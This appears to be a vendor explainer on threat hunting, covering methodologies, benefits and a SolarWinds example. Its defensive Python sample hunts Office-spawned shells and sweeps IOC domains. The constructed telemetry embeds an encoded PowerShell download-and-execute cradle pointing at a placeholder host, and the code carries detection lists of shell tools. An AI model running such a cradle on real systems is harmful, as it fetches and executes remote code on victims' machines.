
Threat hunting

What is threat hunting?

Threat hunting is the proactive practice of searching an environment for threats that the security tools and processes already in place have not detected.

Why threat hunting is important

The SANS Institute's 2020 threat hunting survey found that 65% of organizations have a threat hunting program and that a further 29% plan to implement one within the next year.1

Many companies pair effective malware analysis programs with threat hunting programs, ensuring that they consistently identify both active and latent threats across their environment.

For example, in 2020 SolarWinds used ReversingLabs threat hunting tools to locate the active threats behind the supply chain attack that targeted it, an attack that impacted 18,000 organizations and generated $40 million in damages.2

With malware analysis tools alone, this attack would have remained undetected for the foreseeable future, reaching more users and causing more damage to victims' systems.

Best practices for effective threat hunting

To effectively identify latent threats that could contribute to severe incidents, teams must follow several best practices around methodologies, technology, specialized teams, and threat intelligence.

Three popular threat hunting methodologies include the hypothesis-driven approach, the review of attack indicators, and the use of ML- and AI-based tools.

Hypothesis-driven: This includes spotting abnormalities, forming an educated guess about what caused them, and reviewing the available data to confirm or reject that guess before deciding whether a potential threat warrants a full investigation.

Review of attack indicators: Threat intelligence platforms are used to find indicators of compromise or attack that should then be researched further.

ML- and AI-based assessments: Machine learning and artificial intelligence review data automatically and flag behaviors that deviate from the established baseline.
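The first two methodologies are easiest to see in working code. The following added example (written for this page, not ReversingLabs or SolarWinds code) runs a hypothesis-driven hunt ("a malicious Office macro spawned a shell or PowerShell on a workstation") over constructed Sysmon-style process-creation events, decodes any -EncodedCommand payload it finds, sweeps constructed DNS events against a hypothetical IOC list standing in for a threat intelligence feed, and then ranks hosts by how many independent signals point at them. All hostnames, domains, and events are invented for illustration.

```python
"""Hypothesis-driven hunt plus IOC sweep over constructed telemetry (added example)."""
import base64
import re

# Constructed sample telemetry, not real data: process-creation events in a
# Sysmon-like shape (host, parent image, child image, command line).
_ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://updates.example.test/a.ps1')"
    .encode("utf-16-le")  # PowerShell -EncodedCommand is base64 over UTF-16LE
).decode()

PROCESS_EVENTS = [
    {"host": "ws01", "parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _ENCODED_PAYLOAD},
    {"host": "ws02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},  # benign admin use
    {"host": "ws03", "parent": r"C:\Program Files\Microsoft Office\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
]

# Constructed DNS query events from the same hosts.
DNS_EVENTS = [
    {"host": "ws01", "query": "updates.example.test"},
    {"host": "ws02", "query": "www.microsoft.com"},
    {"host": "ws04", "query": "cdn.example.test."},
]

# Hypothetical IOC domains standing in for a threat-intelligence feed.
IOC_DOMAINS = {"updates.example.test", "cdn.example.test"}

OFFICE_APPS = ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE")
SHELLS = ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")
# PowerShell accepts any unambiguous prefix of -EncodedCommand; longest first.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(b64: str):
    """Return the plaintext of a -EncodedCommand argument, or None if it is not valid."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt_office_spawned_shells(events):
    """Hypothesis: a malicious macro spawned a shell from an Office process.

    Returns one finding per matching event, with the decoded command line
    when the child was launched with an encoded PowerShell payload.
    """
    findings = []
    for ev in events:
        parent = ev["parent"].rsplit("\\", 1)[-1].upper()
        child = ev["image"].rsplit("\\", 1)[-1].lower()
        if parent not in OFFICE_APPS or child not in SHELLS:
            continue
        m = ENC_FLAG.search(ev["cmdline"])
        decoded = decode_encoded_command(m.group(1)) if m else None
        findings.append({"host": ev["host"], "parent": parent,
                         "child": child, "decoded": decoded})
    return findings


def sweep_iocs(dns_events, ioc_domains):
    """Indicator review: match DNS queries against IOC domains and their subdomains."""
    hits = []
    for ev in dns_events:
        q = ev["query"].rstrip(".").lower()  # normalise trailing dot and case
        if any(q == d or q.endswith("." + d) for d in ioc_domains):
            hits.append({"host": ev["host"], "query": q})
    return hits


def prioritize(hyp_findings, ioc_hits):
    """Rank hosts: two independent signals beat one, a behaviour beats a lone IOC."""
    hyp_hosts = {f["host"] for f in hyp_findings}
    ioc_hosts = {h["host"] for h in ioc_hits}
    return {"critical": sorted(hyp_hosts & ioc_hosts),
            "high": sorted(hyp_hosts - ioc_hosts),
            "medium": sorted(ioc_hosts - hyp_hosts)}


if __name__ == "__main__":
    findings = hunt_office_spawned_shells(PROCESS_EVENTS)
    hits = sweep_iocs(DNS_EVENTS, IOC_DOMAINS)
    for f in findings:
        print(f"{f['host']}: {f['parent']} -> {f['child']} decoded={f['decoded']!r}")
    print(prioritize(findings, hits))
```

The hypothesis is deliberately narrow so that a hit is interpretable: ws02 runs PowerShell too, but from explorer.exe with a plain script path, so it is left alone rather than generating a false positive. ws01 is ranked critical because the decoded download cradle and the IOC hit corroborate each other, while ws04 only resolved an IOC domain and is queued for a lower-priority look.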

Threat hunting tools complement existing endpoint detection and response (EDR) tools by offering more complex and detailed analysis to discover suspicious behaviors and patterns that EDR tools cannot detect.

It is also important to create specialized teams that exclusively focus on threat hunting because it requires a unique set of skills. Threat hunters must understand how to operate specific tools, follow the methodologies listed above, and be creative when deciding which potential threats and attack vectors should be addressed.

Finally, threat intelligence guides threat hunters on the severity of threats and indicators of compromise, how they could impact their systems, and how to respond to them, allowing hunters to address security weaknesses effectively.

Business benefits of threat hunting

Faster response times: By reviewing anomalies and assessing threats proactively, teams understand the behaviors and location of malware and are able to formulate remediation strategies and respond faster.

Efficient investigations: When threats emerge, high levels of urgency and stress may lead teams to inefficiently address and resolve issues. By preemptively reviewing issues, organizations can take a calm, measured, and methodical approach toward remediating problems.

Greater visibility: When hunting for threats, analysts must review their environments’ composition and understand what typical behaviors are, providing greater visibility into how their systems function on a day-to-day basis.

Fewer false positives: False positives lead to inefficient security practices because teams spend too much time responding to alerts that do not affect their security posture. By hunting, teams learn what their data looks like and how it is reported, and can then write rules that suppress known-benign activity and limit false positives.

Reduced risk: Proactively addressing security issues before they turn into incidents prevents enterprises' environments from being damaged by latent threats and reduces the cost of operating their systems.4

Keys to effective threat hunting

Create protocols to investigate threats: Develop a checklist for assessing hidden threats so that investigations are consistent and the proper investigative steps are always taken.

Prioritize threats and weaknesses based on severity: This helps SOC teams to understand which problems should be solved first.

Think like an attacker: Locate areas where malware is unlikely to be discovered and learn about how your organization’s specific systems could be exploited by malicious actors to uncover potential attack vectors.

Learn more

For further insights into threat hunting and its implications, explore the following resources:

Integrate threat hunting into the SOC triage process to mitigate software supply chain risk (Blog)
How to Evaluate Threat Intelligence Feeds (Free Guide)
Hunt Threats Continuously
